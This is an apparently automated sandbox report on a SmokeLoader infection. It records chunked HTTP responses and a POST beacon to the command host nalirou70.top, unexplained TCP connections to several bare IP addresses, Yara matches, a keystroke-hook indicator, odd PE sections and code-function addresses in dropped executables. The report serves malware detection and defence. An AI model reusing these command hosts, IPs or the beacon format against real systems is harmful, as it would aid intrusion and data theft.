75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6e 61 6c 69 72 6f 75 37 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at nalirou70.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:21:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6e 61 6c 69 72 6f 75 37 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at nalirou70.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:22:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 df 43 d0 fe 2e 83 21 eb af 95 53 2d e5 b4 4f 28 e3 b3 b5 6e fb 91 b4 5f ab 74 90 cc 36 43 57 39 09 4e dc bb 41 bb e8 51 85 b1 ca 0d cd 3a d6 cf 74 6a 0d 0a 30 0d 0a 0d 0a Data Ascii: 67I:82OB%,YR("XQC.!S-O(n_t6CW9NAQ:tj0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:22:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6e 61 6c 69 72 6f 75 37 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at nalirou70.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:22:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6e 61 6c 69 72 6f 75 37 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at nalirou70.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:22:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6e 61 6c 69 72 6f 75 37 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at nalirou70.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:22:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6e 61 6c 69 72 6f 75 37 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at nalirou70.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 09 Nov 2021 21:22:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 1a ff b5 98 ff ac 18 a8 19 88 2c b4 59 52 db 03 f8 e5 2c f3 65 02 47 e5 aa e3 1e bb 52 df 41 d1 ff 27 87 21 80 a5 9a 52 2e f8 e3 00 7e 0d 0a 30 0d 0a 0d 0a Data Ascii: 45I:82OU&,YR,eGRA'!R.~0
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: 8039.exe, 00000016.00000002.951714322.0000000002ABF000.00000004.00000001.sdmp String found in binary or memory: &l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: 8039.exe, 00000016.00000002.951714322.0000000002ABF000.00000004.00000001.sdmp String found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pstanat.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: nalirou70.top
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49880 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000017.00000002.879242303.00000000020A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.725665133.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.713707724.00000000044C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.797092954.00000000006E1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.725720765.0000000000511000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.783710135.0000000002431000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.783461407.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.797009453.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.878602271.00000000005E0000.00000004.00000001.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: F72D.exe, 0000000C.00000002.785827628.0000000002E09000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
.NET source code contains very large array initializations
Source: 82DC.exe.5.dr, Discrepant.Common/Client.cs Large array initialization: RemoveState: array initializer size 189884
PE file contains section with special chars
Source: 59B4.exe.5.dr Static PE information: section name:
Source: 59B4.exe.5.dr Static PE information: section name:
Source: 59B4.exe.5.dr Static PE information: section name:
Source: 59B4.exe.5.dr Static PE information: section name: ~\1847
Source: 59B4.exe.5.dr Static PE information: section name: ~\1847
Source: 59B4.exe.5.dr Static PE information: section name: ~\1847
Source: 8039.exe.5.dr Static PE information: section name: )EWhgNF
PE file has nameless sections
Source: 8039.exe.5.dr Static PE information: section name:
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_02991238 19_2_02991238
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_02991228 19_2_02991228
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_029914B0 19_2_029914B0
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_029914ED 19_2_029914ED
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_02991594 19_2_02991594
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_029915AA 19_2_029915AA
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_0299151F 19_2_0299151F
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_0299150A 19_2_0299150A
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_02991535 19_2_02991535
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_0299154A 19_2_0299154A
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_02991572 19_2_02991572
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_02993E5E 19_2_02993E5E
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_05579047 19_2_05579047
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_05579A10 19_2_05579A10
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_0557C708 19_2_0557C708
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_0557C628 19_2_0557C628
Source: C:\Users\user\AppData\Local\Temp\59B4.exe Code function: 19_2_055711F0 19_2_055711F0
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C22F0 20_2_013C22F0
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C4650 20_2_013C4650
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C192B 20_2_013C192B
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C197B 20_2_013C197B
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C1968 20_2_013C1968
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C49A0 20_2_013C49A0
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C4990 20_2_013C4990
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C19D7 20_2_013C19D7
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C182C 20_2_013C182C
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C3B39 20_2_013C3B39
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C1B69 20_2_013C1B69
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C3B48 20_2_013C3B48
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C1BA8 20_2_013C1BA8
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C1BC8 20_2_013C1BC8
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C1A95 20_2_013C1A95
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C1ADA 20_2_013C1ADA
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C1D4E 20_2_013C1D4E
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C1DFC 20_2_013C1DFC
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C1DD1 20_2_013C1DD1
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C1C2D 20_2_013C1C2D
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C1C16 20_2_013C1C16
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 20_2_013C1C6B 20_2_013C1C6B
Source: C:\Users\user\AppData\Local\Temp\8039.exe Code function: 22_2_028CEC08 22_2_028CEC08
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D240D20 23_2_6D240D20
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D311D55 23_2_6D311D55
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D262D50 23_2_6D262D50
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2735D0 23_2_6D2735D0
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D262430 23_2_6D262430
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D304496 23_2_6D304496
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D24EC9B 23_2_6D24EC9B
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D272F70 23_2_6D272F70
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2FE7FF 23_2_6D2FE7FF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D3067E2 23_2_6D3067E2
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D266E30 23_2_6D266E30
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2CAE60 23_2_6D2CAE60
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D312EF7 23_2_6D312EF7
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D264120 23_2_6D264120
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D2699BF 23_2_6D2699BF
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D262990 23_2_6D262990
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A830 23_2_6D26A830
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D246800 23_2_6D246800
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D301002 23_2_6D301002
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D278840 23_2_6D278840
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D25B090 23_2_6D25B090
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26A309 23_2_6D26A309
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D263360 23_2_6D263360
Source: C:\Users\user\AppData\Local\Temp\9D57.exe Code function: 23_2_6D26AB40 23_2_6D26AB40
